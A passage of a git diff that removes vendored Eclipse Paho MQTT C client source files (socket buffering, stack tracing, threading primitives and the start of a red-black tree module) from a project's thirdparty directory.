-pending_writes* SocketBuffer_updateWrite(int socket, char* topic, char* payload)
-{
-	pending_writes* pw = NULL;
-	ListElement* le = NULL;
-
-	FUNC_ENTRY;
-	if ((le = ListFindItem(&writes, &socket, pending_socketcompare)) != NULL)
-	{
-		pw = (pending_writes*)(le->content);
-		if (pw->count == 4)
-		{
-			pw->iovecs[2].iov_base = topic;
-			pw->iovecs[3].iov_base = payload;
-		}
-	}
-
-	FUNC_EXIT;
-	return pw;
-}
diff --git a/thirdparty/paho.mqtt.c/src/SocketBuffer.h b/thirdparty/paho.mqtt.c/src/SocketBuffer.h
deleted file mode 100644
index f7702dc..0000000
--- a/thirdparty/paho.mqtt.c/src/SocketBuffer.h
+++ /dev/null
@@ -1,84 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2014 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *    Ian Craggs, Allan Stockdill-Mander - SSL updates
- *******************************************************************************/
-
-#if !defined(SOCKETBUFFER_H)
-#define SOCKETBUFFER_H
-
-#if defined(WIN32) || defined(WIN64)
-#include <winsock2.h>
-#else
-#include <sys/socket.h>
-#endif
-
-#if defined(OPENSSL)
-#include <openssl/ssl.h>
-#endif
-
-#if defined(WIN32) || defined(WIN64)
-	typedef WSABUF iobuf;
-#else
-	typedef struct iovec iobuf;
-#endif
-
-typedef struct
-{
-	int socket;
-	unsigned int index;
-	size_t headerlen;
-	char fixed_header[5];	/**< header plus up to 4 length bytes */
-	size_t buflen, 			/**< total length of the buffer */
-		datalen; 			/**< current length of data in buf */
-	char* buf;
-} socket_queue;
-
-typedef struct
-{
-	int socket, count;
-	size_t total;
-#if defined(OPENSSL)
-	SSL* ssl;
-#endif
-	size_t bytes;
-	iobuf iovecs[5];
-	int frees[5];
-} pending_writes;
-
-#define SOCKETBUFFER_COMPLETE 0
-#if !defined(SOCKET_ERROR)
-	#define SOCKET_ERROR -1
-#endif
-#define SOCKETBUFFER_INTERRUPTED -22 /* must be the same value as TCPSOCKET_INTERRUPTED */
-
-void SocketBuffer_initialize(void);
-void SocketBuffer_terminate(void);
-void SocketBuffer_cleanup(int socket);
-char* SocketBuffer_getQueuedData(int socket, size_t bytes, size_t* actual_len);
-int SocketBuffer_getQueuedChar(int socket, char* c);
-void SocketBuffer_interrupted(int socket, size_t actual_len);
-char* SocketBuffer_complete(int socket);
-void SocketBuffer_queueChar(int socket, char c);
-
-#if defined(OPENSSL)
-void SocketBuffer_pendingWrite(int socket, SSL* ssl, int count, iobuf* iovecs, int* frees, size_t total, size_t bytes);
-#else
-void SocketBuffer_pendingWrite(int socket, int count, iobuf* iovecs, int* frees, size_t total, size_t bytes);
-#endif
-pending_writes* SocketBuffer_getWrite(int socket);
-int SocketBuffer_writeComplete(int socket);
-pending_writes* SocketBuffer_updateWrite(int socket, char* topic, char* payload);
-
-#endif
diff --git a/thirdparty/paho.mqtt.c/src/StackTrace.c b/thirdparty/paho.mqtt.c/src/StackTrace.c
deleted file mode 100644
index dd55f71..0000000
--- a/thirdparty/paho.mqtt.c/src/StackTrace.c
+++ /dev/null
@@ -1,207 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2014 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *******************************************************************************/
-
-#include "StackTrace.h"
-#include "Log.h"
-#include "LinkedList.h"
-
-#include "Clients.h"
-#include "Thread.h"
-
-#include <stdio.h>
-#include <string.h>
-#include <stdlib.h>
-
-#if defined(WIN32) || defined(WIN64)
-#define snprintf _snprintf
-#endif
-
-/*BE
-def STACKENTRY
-{
-	n32 ptr STRING open "name"
-	n32 dec "line"
-}
-
-defList(STACKENTRY)
-BE*/
-
-#define MAX_STACK_DEPTH 50
-#define MAX_FUNCTION_NAME_LENGTH 30
-#define MAX_THREADS 255
-
-typedef struct
-{
-	thread_id_type threadid;
-	char name[MAX_FUNCTION_NAME_LENGTH];
-	int line;
-} stackEntry;
-
-typedef struct
-{
-	thread_id_type id;
-	int maxdepth;
-	int current_depth;
-	stackEntry callstack[MAX_STACK_DEPTH];
-} threadEntry;
-
-#include "StackTrace.h"
-
-static int thread_count = 0;
-static threadEntry threads[MAX_THREADS];
-static threadEntry *cur_thread = NULL;
-
-#if defined(WIN32) || defined(WIN64)
-mutex_type stack_mutex;
-#else
-static pthread_mutex_t stack_mutex_store = PTHREAD_MUTEX_INITIALIZER;
-static mutex_type stack_mutex = &stack_mutex_store;
-#endif
-
-
-int setStack(int create);
-
-
-int setStack(int create)
-{
-	int i = -1;
-	thread_id_type curid = Thread_getid();
-
-	cur_thread = NULL;
-	for (i = 0; i < MAX_THREADS && i < thread_count; ++i)
-	{
-		if (threads[i].id == curid)
-		{
-			cur_thread = &threads[i];
-			break;
-		}
-	}
-
-	if (cur_thread == NULL && create && thread_count < MAX_THREADS)
-	{
-		cur_thread = &threads[thread_count];
-		cur_thread->id = curid;
-		cur_thread->maxdepth = 0;
-		cur_thread->current_depth = 0;
-		++thread_count;
-	}
-	return cur_thread != NULL; /* good == 1 */
-}
-
-void StackTrace_entry(const char* name, int line, enum LOG_LEVELS trace_level)
-{
-	Thread_lock_mutex(stack_mutex);
-	if (!setStack(1))
-		goto exit;
-	if (trace_level != -1)
-		Log_stackTrace(trace_level, 9, (int)cur_thread->id, cur_thread->current_depth, name, line, NULL);
-	strncpy(cur_thread->callstack[cur_thread->current_depth].name, name, sizeof(cur_thread->callstack[0].name)-1);
-	cur_thread->callstack[(cur_thread->current_depth)++].line = line;
-	if (cur_thread->current_depth > cur_thread->maxdepth)
-		cur_thread->maxdepth = cur_thread->current_depth;
-	if (cur_thread->current_depth >= MAX_STACK_DEPTH)
-		Log(LOG_FATAL, -1, "Max stack depth exceeded");
-exit:
-	Thread_unlock_mutex(stack_mutex);
-}
-
-
-void StackTrace_exit(const char* name, int line, void* rc, enum LOG_LEVELS trace_level)
-{
-	Thread_lock_mutex(stack_mutex);
-	if (!setStack(0))
-		goto exit;
-	if (--(cur_thread->current_depth) < 0)
-		Log(LOG_FATAL, -1, "Minimum stack depth exceeded for thread %lu", cur_thread->id);
-	if (strncmp(cur_thread->callstack[cur_thread->current_depth].name, name, sizeof(cur_thread->callstack[0].name)-1) != 0)
-		Log(LOG_FATAL, -1, "Stack mismatch. Entry:%s Exit:%s\n", cur_thread->callstack[cur_thread->current_depth].name, name);
-	if (trace_level != -1)
-	{
-		if (rc == NULL)
-			Log_stackTrace(trace_level, 10, (int)cur_thread->id, cur_thread->current_depth, name, line, NULL);
-		else
-			Log_stackTrace(trace_level, 11, (int)cur_thread->id, cur_thread->current_depth, name, line, (int*)rc);
-	}
-exit:
-	Thread_unlock_mutex(stack_mutex);
-}
-
-
-void StackTrace_printStack(FILE* dest)
-{
-	FILE* file = stdout;
-	int t = 0;
-
-	if (dest)
-		file = dest;
-	for (t = 0; t < thread_count; ++t)
-	{
-		threadEntry *cur_thread = &threads[t];
-
-		if (cur_thread->id > 0)
-		{
-			int i = cur_thread->current_depth - 1;
-
-			fprintf(file, "=========== Start of stack trace for thread %lu ==========\n", (unsigned long)cur_thread->id);
-			if (i >= 0)
-			{
-				fprintf(file, "%s (%d)\n", cur_thread->callstack[i].name, cur_thread->callstack[i].line);
-				while (--i >= 0)
-					fprintf(file, "   at %s (%d)\n", cur_thread->callstack[i].name, cur_thread->callstack[i].line);
-			}
-			fprintf(file, "=========== End of stack trace for thread %lu ==========\n\n", (unsigned long)cur_thread->id);
-		}
-	}
-	if (file != stdout && file != stderr && file != NULL)
-		fclose(file);
-}
-
-
-char* StackTrace_get(thread_id_type threadid)
-{
-	int bufsize = 256;
-	char* buf = NULL;
-	int t = 0;
-
-	if ((buf = malloc(bufsize)) == NULL)
-		goto exit;
-	buf[0] = '\0';
-	for (t = 0; t < thread_count; ++t)
-	{
-		threadEntry *cur_thread = &threads[t];
-
-		if (cur_thread->id == threadid)
-		{
-			int i = cur_thread->current_depth - 1;
-			int curpos = 0;
-
-			if (i >= 0)
-			{
-				curpos += snprintf(&buf[curpos], bufsize - curpos -1,
-						"%s (%d)\n", cur_thread->callstack[i].name, cur_thread->callstack[i].line);
-				while (--i >= 0)
-					curpos += snprintf(&buf[curpos], bufsize - curpos -1,
-							"   at %s (%d)\n", cur_thread->callstack[i].name, cur_thread->callstack[i].line);
-				if (buf[--curpos] == '\n')
-					buf[curpos] = '\0';
-			}
-			break;
-		}
-	}
-exit:
-	return buf;
-}
-
diff --git a/thirdparty/paho.mqtt.c/src/StackTrace.h b/thirdparty/paho.mqtt.c/src/StackTrace.h
deleted file mode 100644
index f4ebba2..0000000
--- a/thirdparty/paho.mqtt.c/src/StackTrace.h
+++ /dev/null
@@ -1,71 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2014 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *******************************************************************************/
-
-#ifndef STACKTRACE_H_
-#define STACKTRACE_H_
-
-#include <stdio.h>
-#include "Log.h"
-#include "Thread.h"
-
-#if defined(NOSTACKTRACE)
-#define FUNC_ENTRY
-#define FUNC_ENTRY_NOLOG
-#define FUNC_ENTRY_MED
-#define FUNC_ENTRY_MAX
-#define FUNC_EXIT
-#define FUNC_EXIT_NOLOG
-#define FUNC_EXIT_MED
-#define FUNC_EXIT_MAX
-#define FUNC_EXIT_RC(x)
-#define FUNC_EXIT_MED_RC(x)
-#define FUNC_EXIT_MAX_RC(x)
-#else
-#if defined(WIN32) || defined(WIN64)
-#define inline __inline
-#define FUNC_ENTRY StackTrace_entry(__FUNCTION__, __LINE__, TRACE_MINIMUM)
-#define FUNC_ENTRY_NOLOG StackTrace_entry(__FUNCTION__, __LINE__, -1)
-#define FUNC_ENTRY_MED StackTrace_entry(__FUNCTION__, __LINE__, TRACE_MEDIUM)
-#define FUNC_ENTRY_MAX StackTrace_entry(__FUNCTION__, __LINE__, TRACE_MAXIMUM)
-#define FUNC_EXIT StackTrace_exit(__FUNCTION__, __LINE__, NULL, TRACE_MINIMUM)
-#define FUNC_EXIT_NOLOG StackTrace_exit(__FUNCTION__, __LINE__, -1)
-#define FUNC_EXIT_MED StackTrace_exit(__FUNCTION__, __LINE__, NULL, TRACE_MEDIUM)
-#define FUNC_EXIT_MAX StackTrace_exit(__FUNCTION__, __LINE__, NULL, TRACE_MAXIMUM)
-#define FUNC_EXIT_RC(x) StackTrace_exit(__FUNCTION__, __LINE__, &x, TRACE_MINIMUM)
-#define FUNC_EXIT_MED_RC(x) StackTrace_exit(__FUNCTION__, __LINE__, &x, TRACE_MEDIUM)
-#define FUNC_EXIT_MAX_RC(x) StackTrace_exit(__FUNCTION__, __LINE__, &x, TRACE_MAXIMUM)
-#else
-#define FUNC_ENTRY StackTrace_entry(__func__, __LINE__, TRACE_MINIMUM)
-#define FUNC_ENTRY_NOLOG StackTrace_entry(__func__, __LINE__, -1)
-#define FUNC_ENTRY_MED StackTrace_entry(__func__, __LINE__, TRACE_MEDIUM)
-#define FUNC_ENTRY_MAX StackTrace_entry(__func__, __LINE__, TRACE_MAXIMUM)
-#define FUNC_EXIT StackTrace_exit(__func__, __LINE__, NULL, TRACE_MINIMUM)
-#define FUNC_EXIT_NOLOG StackTrace_exit(__func__, __LINE__, NULL, -1)
-#define FUNC_EXIT_MED StackTrace_exit(__func__, __LINE__, NULL, TRACE_MEDIUM)
-#define FUNC_EXIT_MAX StackTrace_exit(__func__, __LINE__, NULL, TRACE_MAXIMUM)
-#define FUNC_EXIT_RC(x) StackTrace_exit(__func__, __LINE__, &x, TRACE_MINIMUM)
-#define FUNC_EXIT_MED_RC(x) StackTrace_exit(__func__, __LINE__, &x, TRACE_MEDIUM)
-#define FUNC_EXIT_MAX_RC(x) StackTrace_exit(__func__, __LINE__, &x, TRACE_MAXIMUM)
-#endif
-#endif
-
-void StackTrace_entry(const char* name, int line, enum LOG_LEVELS trace);
-void StackTrace_exit(const char* name, int line, void* return_value, enum LOG_LEVELS trace);
-
-void StackTrace_printStack(FILE* dest);
-char* StackTrace_get(thread_id_type);
-
-#endif /* STACKTRACE_H_ */
diff --git a/thirdparty/paho.mqtt.c/src/Thread.c b/thirdparty/paho.mqtt.c/src/Thread.c
deleted file mode 100644
index 37aaa58..0000000
--- a/thirdparty/paho.mqtt.c/src/Thread.c
+++ /dev/null
@@ -1,462 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2017 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution.
- *
- * The Eclipse Public License is available at
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial implementation
- *    Ian Craggs, Allan Stockdill-Mander - async client updates
- *    Ian Craggs - bug #415042 - start Linux thread as disconnected
- *    Ian Craggs - fix for bug #420851
- *    Ian Craggs - change MacOS semaphore implementation
- *******************************************************************************/
-
-/**
- * @file
- * \brief Threading related functions
- *
- * Used to create platform independent threading functions
- */
-
-
-#include "Thread.h"
-#if defined(THREAD_UNIT_TESTS)
-#define NOSTACKTRACE
-#endif
-#include "StackTrace.h"
-
-#undef malloc
-#undef realloc
-#undef free
-
-#if !defined(WIN32) && !defined(WIN64)
-#include <errno.h>
-#include <unistd.h>
-#include <sys/time.h>
-#include <fcntl.h>
-#include <stdio.h>
-#include <sys/stat.h>
-#include <limits.h>
-#endif
-#include <stdlib.h>
-
-#include "OsWrapper.h"
-
-/**
- * Start a new thread
- * @param fn the function to run, must be of the correct signature
- * @param parameter pointer to the function parameter, can be NULL
- * @return the new thread
- */
-thread_type Thread_start(thread_fn fn, void* parameter)
-{
-#if defined(WIN32) || defined(WIN64)
-	thread_type thread = NULL;
-#else
-	thread_type thread = 0;
-	pthread_attr_t attr;
-#endif
-
-	FUNC_ENTRY;
-#if defined(WIN32) || defined(WIN64)
-	thread = CreateThread(NULL, 0, fn, parameter, 0, NULL);
-#else
-	pthread_attr_init(&attr);
-	pthread_attr_setdetachstate(&attr, PTHREAD_CREATE_DETACHED);
-	if (pthread_create(&thread, &attr, fn, parameter) != 0)
-		thread = 0;
-	pthread_attr_destroy(&attr);
-#endif
-	FUNC_EXIT;
-	return thread;
-}
-
-
-/**
- * Create a new mutex
- * @return the new mutex
- */
-mutex_type Thread_create_mutex(void)
-{
-	mutex_type mutex = NULL;
-	int rc = 0;
-
-	FUNC_ENTRY;
-	#if defined(WIN32) || defined(WIN64)
-		mutex = CreateMutex(NULL, 0, NULL);
-		if (mutex == NULL)
-			rc = GetLastError();
-	#else
-		mutex = malloc(sizeof(pthread_mutex_t));
-		rc = pthread_mutex_init(mutex, NULL);
-	#endif
-	FUNC_EXIT_RC(rc);
-	return mutex;
-}
-
-
-/**
- * Lock a mutex which has alrea
- * @return completion code, 0 is success
- */
-int Thread_lock_mutex(mutex_type mutex)
-{
-	int rc = -1;
-
-	/* don't add entry/exit trace points as the stack log uses mutexes - recursion beckons */
-	#if defined(WIN32) || defined(WIN64)
-		/* WaitForSingleObject returns WAIT_OBJECT_0 (0), on success */
-		rc = WaitForSingleObject(mutex, INFINITE);
-	#else
-		rc = pthread_mutex_lock(mutex);
-	#endif
-
-	return rc;
-}
-
-
-/**
- * Unlock a mutex which has already been locked
- * @param mutex the mutex
- * @return completion code, 0 is success
- */
-int Thread_unlock_mutex(mutex_type mutex)
-{
-	int rc = -1;
-
-	/* don't add entry/exit trace points as the stack log uses mutexes - recursion beckons */
-	#if defined(WIN32) || defined(WIN64)
-		/* if ReleaseMutex fails, the return value is 0 */
-		if (ReleaseMutex(mutex) == 0)
-			rc = GetLastError();
-		else
-			rc = 0;
-	#else
-		rc = pthread_mutex_unlock(mutex);
-	#endif
-
-	return rc;
-}
-
-
-/**
- * Destroy a mutex which has already been created
- * @param mutex the mutex
- */
-void Thread_destroy_mutex(mutex_type mutex)
-{
-	int rc = 0;
-
-	FUNC_ENTRY;
-	#if defined(WIN32) || defined(WIN64)
-		rc = CloseHandle(mutex);
-	#else
-		rc = pthread_mutex_destroy(mutex);
-		free(mutex);
-	#endif
-	FUNC_EXIT_RC(rc);
-}
-
-
-/**
- * Get the thread id of the thread from which this function is called
- * @return thread id, type varying according to OS
- */
-thread_id_type Thread_getid(void)
-{
-	#if defined(WIN32) || defined(WIN64)
-		return GetCurrentThreadId();
-	#else
-		return pthread_self();
-	#endif
-}
-
-
-/**
- * Create a new semaphore
- * @return the new condition variable
- */
-sem_type Thread_create_sem(void)
-{
-	sem_type sem = NULL;
-	int rc = 0;
-
-	FUNC_ENTRY;
-	#if defined(WIN32) || defined(WIN64)
-		sem = CreateEvent(
-		        NULL,               /* default security attributes */
-		        FALSE,              /* manual-reset event? */
-		        FALSE,              /* initial state is nonsignaled */
-		        NULL                /* object name */
-		        );
-	#elif defined(OSX)
-		sem = dispatch_semaphore_create(0L);
-		rc = (sem == NULL) ? -1 : 0;
-	#else
-		sem = malloc(sizeof(sem_t));
-		rc = sem_init(sem, 0, 0);
-	#endif
-	FUNC_EXIT_RC(rc);
-	return sem;
-}
-
-
-/**
- * Wait for a semaphore to be posted, or timeout.
- * @param sem the semaphore
- * @param timeout the maximum time to wait, in milliseconds
- * @return completion code
- */
-int Thread_wait_sem(sem_type sem, int timeout)
-{
-/* sem_timedwait is the obvious call to use, but seemed not to work on the Viper,
- * so I've used trywait in a loop instead. Ian Craggs 23/7/2010
- */
-	int rc = -1;
-#if !defined(WIN32) && !defined(WIN64) && !defined(OSX)
-#define USE_TRYWAIT
-#if defined(USE_TRYWAIT)
-	int i = 0;
-	int interval = 10000; /* 10000 microseconds: 10 milliseconds */
-	int count = (1000 * timeout) / interval; /* how many intervals in timeout period */
-#else
-	struct timespec ts;
-#endif
-#endif
-
-	FUNC_ENTRY;
-	#if defined(WIN32) || defined(WIN64)
-		rc = WaitForSingleObject(sem, timeout < 0 ? 0 : timeout);
-  #elif defined(OSX)
-		rc = (int)dispatch_semaphore_wait(sem, dispatch_time(DISPATCH_TIME_NOW, (int64_t)timeout*1000000L));
-	#elif defined(USE_TRYWAIT)
-		while (++i < count && (rc = sem_trywait(sem)) != 0)
-		{
-			if (rc == -1 && ((rc = errno) != EAGAIN))
-			{
-				rc = 0;
-				break;
-			}
-			usleep(interval); /* microseconds - .1 of a second */
-		}
-	#else
-		if (clock_gettime(CLOCK_REALTIME, &ts) != -1)
-		{
-			ts.tv_sec += timeout;
-			rc = sem_timedwait(sem, &ts);
-		}
-	#endif
-
- 	FUNC_EXIT_RC(rc);
- 	return rc;
-}
-
-
-/**
- * Check to see if a semaphore has been posted, without waiting.
- * @param sem the semaphore
- * @return 0 (false) or 1 (true)
- */
-int Thread_check_sem(sem_type sem)
-{
-#if defined(WIN32) || defined(WIN64)
-	return WaitForSingleObject(sem, 0) == WAIT_OBJECT_0;
-#elif defined(OSX)
-  return dispatch_semaphore_wait(sem, DISPATCH_TIME_NOW) == 0;
-#else
-	int semval = -1;
-	sem_getvalue(sem, &semval);
-	return semval > 0;
-#endif
-}
-
-
-/**
- * Post a semaphore
- * @param sem the semaphore
- * @return completion code
- */
-int Thread_post_sem(sem_type sem)
-{
-	int rc = 0;
-
-	FUNC_ENTRY;
-	#if defined(WIN32) || defined(WIN64)
-		if (SetEvent(sem) == 0)
-			rc = GetLastError();
-	#elif defined(OSX)
-		rc = (int)dispatch_semaphore_signal(sem);
-	#else
-		if (sem_post(sem) == -1)
-			rc = errno;
-	#endif
-
- 	FUNC_EXIT_RC(rc);
-  return rc;
-}
-
-
-/**
- * Destroy a semaphore which has already been created
- * @param sem the semaphore
- */
-int Thread_destroy_sem(sem_type sem)
-{
-	int rc = 0;
-
-	FUNC_ENTRY;
-	#if defined(WIN32) || defined(WIN64)
-		rc = CloseHandle(sem);
-  #elif defined(OSX)
-	  dispatch_release(sem);
-	#else
-		rc = sem_destroy(sem);
-		free(sem);
-	#endif
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-#if !defined(WIN32) && !defined(WIN64)
-/**
- * Create a new condition variable
- * @return the condition variable struct
- */
-cond_type Thread_create_cond(void)
-{
-	cond_type condvar = NULL;
-	int rc = 0;
-
-	FUNC_ENTRY;
-	condvar = malloc(sizeof(cond_type_struct));
-	rc = pthread_cond_init(&condvar->cond, NULL);
-	rc = pthread_mutex_init(&condvar->mutex, NULL);
-
-	FUNC_EXIT_RC(rc);
-	return condvar;
-}
-
-/**
- * Signal a condition variable
- * @return completion code
- */
-int Thread_signal_cond(cond_type condvar)
-{
-	int rc = 0;
-
-	pthread_mutex_lock(&condvar->mutex);
-	rc = pthread_cond_signal(&condvar->cond);
-	pthread_mutex_unlock(&condvar->mutex);
-
-	return rc;
-}
-
-/**
- * Wait with a timeout (seconds) for condition variable
- * @return completion code
- */
-int Thread_wait_cond(cond_type condvar, int timeout)
-{
-	FUNC_ENTRY;
-	int rc = 0;
-	struct timespec cond_timeout;
-	struct timeval cur_time;
-
-	gettimeofday(&cur_time, NULL);
-
-	cond_timeout.tv_sec = cur_time.tv_sec + timeout;
-	cond_timeout.tv_nsec = cur_time.tv_usec * 1000;
-
-	pthread_mutex_lock(&condvar->mutex);
-	rc = pthread_cond_timedwait(&condvar->cond, &condvar->mutex, &cond_timeout);
-	pthread_mutex_unlock(&condvar->mutex);
-
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-/**
- * Destroy a condition variable
- * @return completion code
- */
-int Thread_destroy_cond(cond_type condvar)
-{
-	int rc = 0;
-
-	rc = pthread_mutex_destroy(&condvar->mutex);
-	rc = pthread_cond_destroy(&condvar->cond);
-	free(condvar);
-
-	return rc;
-}
-#endif
-
-
-#if defined(THREAD_UNIT_TESTS)
-
-#include <stdio.h>
-
-thread_return_type secondary(void* n)
-{
-	int rc = 0;
-
-	/*
-	cond_type cond = n;
-
-	printf("Secondary thread about to wait\n");
-	rc = Thread_wait_cond(cond);
-	printf("Secondary thread returned from wait %d\n", rc);*/
-
-	sem_type sem = n;
-
-	printf("Secondary thread about to wait\n");
-	rc = Thread_wait_sem(sem);
-	printf("Secondary thread returned from wait %d\n", rc);
-
-	printf("Secondary thread about to wait\n");
-	rc = Thread_wait_sem(sem);
-	printf("Secondary thread returned from wait %d\n", rc);
-	printf("Secondary check sem %d\n", Thread_check_sem(sem));
-
-	return 0;
-}
-
-
-int main(int argc, char *argv[])
-{
-	int rc = 0;
-
-	sem_type sem = Thread_create_sem();
-
-	printf("check sem %d\n", Thread_check_sem(sem));
-
-	printf("post secondary\n");
-	rc = Thread_post_sem(sem);
-	printf("posted secondary %d\n", rc);
-
-	printf("check sem %d\n", Thread_check_sem(sem));
-
-	printf("Starting secondary thread\n");
-	Thread_start(secondary, (void*)sem);
-
-	sleep(3);
-	printf("check sem %d\n", Thread_check_sem(sem));
-
-	printf("post secondary\n");
-	rc = Thread_post_sem(sem);
-	printf("posted secondary %d\n", rc);
-
-	sleep(3);
-
-	printf("Main thread ending\n");
-}
-
-#endif
diff --git a/thirdparty/paho.mqtt.c/src/Thread.h b/thirdparty/paho.mqtt.c/src/Thread.h
deleted file mode 100644
index 995e221..0000000
--- a/thirdparty/paho.mqtt.c/src/Thread.h
+++ /dev/null
@@ -1,73 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2017 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution.
- *
- * The Eclipse Public License is available at
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial implementation
- *    Ian Craggs, Allan Stockdill-Mander - async client updates
- *    Ian Craggs - fix for bug #420851
- *    Ian Craggs - change MacOS semaphore implementation
- *******************************************************************************/
-#include "MQTTClient.h"
-
-#if !defined(THREAD_H)
-#define THREAD_H
-
-#if defined(WIN32) || defined(WIN64)
-	#include <windows.h>
-	#define thread_type HANDLE
-	#define thread_id_type DWORD
-	#define thread_return_type DWORD
-	#define thread_fn LPTHREAD_START_ROUTINE
-	#define mutex_type HANDLE
-	#define cond_type HANDLE
-	#define sem_type HANDLE
-#else
-	#include <pthread.h>
-
-	#define thread_type pthread_t
-	#define thread_id_type pthread_t
-	#define thread_return_type void*
-	typedef thread_return_type (*thread_fn)(void*);
-	#define mutex_type pthread_mutex_t*
-	typedef struct { pthread_cond_t cond; pthread_mutex_t mutex; } cond_type_struct;
-	typedef cond_type_struct *cond_type;
-	#if defined(OSX)
-	  #include <dispatch/dispatch.h>
-	  typedef dispatch_semaphore_t sem_type;
-	#else
-	  #include <semaphore.h>
-	  typedef sem_t *sem_type;
-	#endif
-
-	cond_type Thread_create_cond(void);
-	int Thread_signal_cond(cond_type);
-	int Thread_wait_cond(cond_type condvar, int timeout);
-	int Thread_destroy_cond(cond_type);
-#endif
-
-DLLExport thread_type Thread_start(thread_fn, void*);
-
-DLLExport mutex_type Thread_create_mutex();
-DLLExport int Thread_lock_mutex(mutex_type);
-DLLExport int Thread_unlock_mutex(mutex_type);
-void Thread_destroy_mutex(mutex_type);
-
-DLLExport thread_id_type Thread_getid();
-
-sem_type Thread_create_sem(void);
-int Thread_wait_sem(sem_type sem, int timeout);
-int Thread_check_sem(sem_type sem);
-int Thread_post_sem(sem_type sem);
-int Thread_destroy_sem(sem_type sem);
-
-
-#endif
diff --git a/thirdparty/paho.mqtt.c/src/Tree.c b/thirdparty/paho.mqtt.c/src/Tree.c
deleted file mode 100644
index 13134d6..0000000
--- a/thirdparty/paho.mqtt.c/src/Tree.c
+++ /dev/null
@@ -1,724 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2013 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial implementation and documentation
- *******************************************************************************/
-
-/** @file
- * \brief functions which apply to tree structures.
- *
- * These trees can hold data of any sort, pointed to by the content pointer of the
- * Node structure.
- * */
-
-#define NO_HEAP_TRACKING 1
-
-#include "Tree.h"
-
-#include <stdlib.h>
-#include <stdio.h>
-#include <string.h>
-
-#include "Heap.h"
-
-
-int isRed(Node* aNode);
-int isBlack(Node* aNode);
-int TreeWalk(Node* curnode, int depth);
-int TreeMaxDepth(Tree *aTree);
-void TreeRotate(Tree* aTree, Node* curnode, int direction, int index);
-Node* TreeBAASub(Tree* aTree, Node* curnode, int which, int index);
-void TreeBalanceAfterAdd(Tree* aTree, Node* curnode, int index);
-void* TreeAddByIndex(Tree* aTree, void* content, size_t size, int index);
-Node* TreeFindIndex1(Tree* aTree, void* key, int index, int value);
-Node* TreeFindContentIndex(Tree* aTree, void* key, int index);
-Node* TreeMinimum(Node* curnode);
-Node* TreeSuccessor(Node* curnode);
-Node* TreeNextElementIndex(Tree* aTree, Node* curnode, int index);
-Node* TreeBARSub(Tree* aTree, Node* curnode, int which, int index);
-void TreeBalanceAfterRemove(Tree* aTree, Node* curnode, int index);
-void* TreeRemoveIndex(Tree* aTree, void* content, int index);
-
-
-void TreeInitializeNoMalloc(Tree* aTree, int(*compare)(void*, void*, int))
-{
-	memset(aTree, '\0', sizeof(Tree));
-	aTree->heap_tracking = 1;
-	aTree->index[0].compare = compare;
-	aTree->indexes = 1;
-}
-
-/**
- * Allocates and initializes a new tree structure.
- * @return a pointer to the new tree structure
- */
-Tree* TreeInitialize(int(*compare)(void*, void*, int))
-{
-#if defined(UNIT_TESTS)
-	Tree* newt = malloc(sizeof(Tree));
-#else
-	Tree* newt = mymalloc(__FILE__, __LINE__, sizeof(Tree));
-#endif
-	TreeInitializeNoMalloc(newt, compare);
-	return newt;
-}
-
-
-void TreeAddIndex(Tree* aTree, int(*compare)(void*, void*, int))
-{
-	aTree->index[aTree->indexes].compare = compare;
-	++(aTree->indexes);
-}
-
-
-void TreeFree(Tree* aTree)
-{
-#if defined(UNIT_TESTS)
-	free(aTree);
-#else
-	(aTree->heap_tracking) ? myfree(__FILE__, __LINE__, aTree) : free(aTree);
-#endif
-}
-
-
-#define LEFT 0
-#define RIGHT 1
-#if !defined(max)
-#define max(a, b) (a > b) ? a : b;
-#endif
-
-
-
-int isRed(Node* aNode)
-{
-	return (aNode != NULL) && (aNode->red);
-}
-
-
-int isBlack(Node* aNode)
-{
